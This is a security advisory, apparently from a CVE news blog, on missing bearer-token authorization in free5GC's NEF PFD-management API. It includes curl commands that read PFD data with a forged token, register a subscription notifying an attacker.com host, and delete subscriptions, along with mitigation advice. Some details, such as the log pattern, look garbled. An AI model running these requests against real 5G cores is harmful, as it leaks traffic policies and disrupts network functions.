Listen to this Post
The vulnerability resides in free5GC’s Network Exposure Function (NEF) which mounts the `nnef-pfdmanagement` route group without any inbound OAuth2 or bearer-token authorization middleware. Despite the NEF advertising the setting `receive from NRF: true` (meaning it claims to validate tokens issued by the NRF), the route group is mounted without authentication checks. An attacker who can reach the NEF on the Service Based Interface (SBI) can supply a forged or completely arbitrary bearer token (e.g., Authorization: Bearer not-a-real-token) and still have their requests processed. The vulnerable endpoints include `GET /applications` and `GET /applications/{appID}` to read Packet Flow Description (PFD) application data, as well as `POST /subscriptions` and `DELETE /subscriptions/{subID}` to create or delete PFD change-notification subscriptions. Code evidence shows that the route group is mounted without auth middleware at NFs/nef/internal/sbi/server.go:56, and the read/subscription handlers directly query the UDR (Unified Data Repository) without verifying the token. The `POST /subscriptions` handler only checks for the presence of `notifyUri` and stores the subscription, while `DELETE` removes it unconditionally. The NEF context exposes outbound token acquisition (GetTokenCtx) but lacks any inbound authorization path. This issue was validated against the official Docker compose lab using NEF container `free5gc/nef:v4.2.0` and source tag v4.2.1. The same root cause affects other NEF SBI findings, but unlike OAM and traffic-influence groups, `nnef-pfdmanagement` is declared in the runtime ServiceList, making it the production-intended path that operators expect to be secured.
DailyCVE form:
Platform: free5GC NEF SBI
Version: v4.2.1
Vulnerability: Missing auth middleware
Severity: Critical
date: 2026-03-11
Prediction: Patch 2026-03-15
What Undercode Say:
Check NEF route group mount without auth (source code)
grep -n "nnef-pfdmanagement" NFs/nef/internal/sbi/server.go
Expected output: line 56 showing group without auth middleware
Simulate forged token read of all PFD applications
curl -i -H 'Authorization: Bearer not-a-real-token' \
'http://<NEF-IP>:8000/nnef-pfdmanagement/v1/applications'
Create malicious subscription with attacker-controlled notifyUri
curl -i -X POST \
-H 'Authorization: Bearer fake' \
-H 'Content-Type: application/json' \
--data '{"applicationIds":["victim-app"],"notifyUri":"http://attacker.com/collect"}' \
http://<NEF-IP>:8000/nnef-pfdmanagement/v1/subscriptions
Delete legitimate subscription
curl -i -X DELETE -H 'Authorization: Bearer fake' \
http://<NEF-IP>:8000/nnef-pfdmanagement/v1/subscriptions/1
Exploit:
An attacker on the same network as NEF SBI (typically port 8000) sends HTTP requests to the vulnerable endpoints with any string in the `Authorization: Bearer` header. No cryptographic validation occurs. The NEF processes the request, queries UDR, and returns PFD data (URL regex patterns, app IDs) or creates/deletes subscriptions. The attacker can also pivot by setting `notifyUri` to an internal service, triggering NEF to send outbound notifications on PFD changes.
Protection from this CVE:
Apply upstream fix from free5gc/nef23 which adds OAuth2 middleware to the `nnef-pfdmanagement` route group. Alternatively, manually wrap the route group with token validation in server.go. Deploy network ACLs to restrict SBI access to trusted NRF and core components only. Monitor NEF logs for requests with invalid or missing bearer tokens reaching handlers (indicated by `[bash][NEF][bash]` entries without prior auth failures).
Impact:
Unauthenticated remote attacker can read all AF-supplied PFD application data (leaking traffic classification policies), create arbitrary change-notification subscriptions turning NEF into an outbound request proxy, and delete legitimate subscriptions disrupting PFD updates to SMF/UPF. This breaks the expected OAuth2 security boundary and violates 3GPP TS 29.522 requirements for NEF.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
